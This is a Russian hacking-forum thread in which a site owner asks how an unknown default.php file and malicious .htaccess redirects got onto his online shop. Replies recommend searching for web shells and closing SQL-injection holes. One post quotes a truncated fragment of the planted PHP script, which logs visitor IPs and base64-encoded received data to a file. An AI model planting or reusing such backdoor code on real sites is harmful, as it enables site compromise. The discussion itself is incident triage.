PDA

Просмотр полной версии : default.php


Asbury
17.01.2013, 04:05
Привет народ, снедавних пор на моем сайте стали проиходить чудеса. Появляется скрипт с содержанием:




Так вот я вроде всё делал как на любимом форуме написано, все данные внешние перед запросом обрабатывал функцией mysql_real_escape_string, где переменная цифровая проверял цифровая ли она и тп, а получается есть sqlinj.

Друзья, как быть?

То просто фаил появлялся, а теперь htaccess ставится редирект на какойто ГС...

cat1vo
17.01.2013, 05:38
Может проблема не в Вас в соседе который тоже находится на этом сервере? Обратитесь с проблемой к хостингу провайдеру. Пусть они проверят логи, откуда, что и куда...

Cennarios
17.01.2013, 11:51
Аж греют душу такие сообщения =))))))))))))))))))) (Гомерический хохот за кадром)

Asbury
17.01.2013, 12:13
cat1vo, Да вот дело в том что логи предоставляются, а в них грамота филькина. Вроде как во мне причина...

Cennarios, есть замечательный русские поговорки про радость чужим неудачам...

qaz
17.01.2013, 12:26
ТС, убирай этот код, закрывай дыры, ищи среди файлов шеллы, а также минишеллы записанные среди кода твоих основных файлов, прост посмотри какие в последнийраз менялись и быстро найдёшь

cLauZ
17.01.2013, 12:39
Что за проект?=)

йож
17.01.2013, 12:45
дай ссылку на этот файл, посмотрим

Asbury
17.01.2013, 14:05
qaz, так могли дату обновления подменить)

Минишел - это запрос к текстовому фаилу с последущей генерацией на сервере шела?)

cLauZ, интернет-магазин

йож, так содержание фаила выложено.

Предоставили мне логи, а там жесть какаято. Щас буду учиться читать логи. Но как я понимаю фаила с дырой мне не скажут логи?)

Qwert321
17.01.2013, 23:02
Появляется скрипт с содержанием:


вот если надо, чё там внутри...


0) print'STATUS-IMPORT-OK';

if (strlen($data) >12) {

$fp=@fopen('tmpfile','a');

@flock($fp,LOCK_EX);

@fputs($fp,$_SERVER['REMOTE_ADDR']."\t".base64_encode($data)."\r\n");

@flock($fp,LOCK_UN);

@fclose($fp);

}

}

exit;

?>

Asbury
18.01.2013, 02:05
могу ли я запись:

Tue Nov 06 18:36:02 2012 0 ::ffff:65.254.224.34 3040 /home/users1/a/user_name/default.php b _ i r юзер ftp 0 * c

интерпретировать, как косяк со стороны хостинга?!

Получается что фаил был внезапно скачан в корневую директорию ftp, а не в один из сайтов на ftp, за которые спрос был бы с меня?

qaz
18.01.2013, 12:14
qaz
, так могли дату обновления подменить)


не мели чепуху


Минишел - это запрос к текстовому фаилу с последущей генерацией на сервере шела?)


да и вобще, те логи толку тебе особого не дадут, делай как я сказал или будешь до конца своих дней там парится

Asbury
18.01.2013, 20:42
qaz, шеллом я менял дату изменения фаила...

Совет то не плохой, осталось лишь решить, с чего начать.

Залиться могли только при наличии sql-inj? Или могут быть и другие дыры в пхп скрипте?

Подумал, а если из переменной которую подставляю в запрос вырезать кавычки, поможет?)